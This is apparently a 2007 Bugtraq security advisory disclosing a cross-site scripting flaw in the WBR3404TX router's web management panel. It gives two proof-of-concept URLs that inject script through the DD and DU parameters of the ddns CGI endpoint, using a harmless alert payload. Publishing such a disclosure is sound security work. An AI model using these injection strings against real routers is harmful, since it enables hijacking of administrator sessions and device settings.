[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
WBR3404TX Broadband Router XSS
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: WBR3404TX Broadband Router XSS
- From: azizov@xxxxxxxxxxxx
- Date: 19 Sep 2007 17:37:21 -0000
I.Overview
Current firmware version is R1.94p0vTIG (*the latest).
WBR3404TX Broadband Router Web Management
II.Description
http://[routeraddress]/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=%22%3E%3Cscript%3Ealert('xss%20detected!');%3C/script%3E%3Ctext%20id=%22&DU=&DW=
http://[routeraddress]/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=&DU=%22%3E%3Cscript%3Ealert('xss%20detected!');%3C/script%3E%3Ctext%20id=%22&DW=
Open to XSS atacks via the web management panel.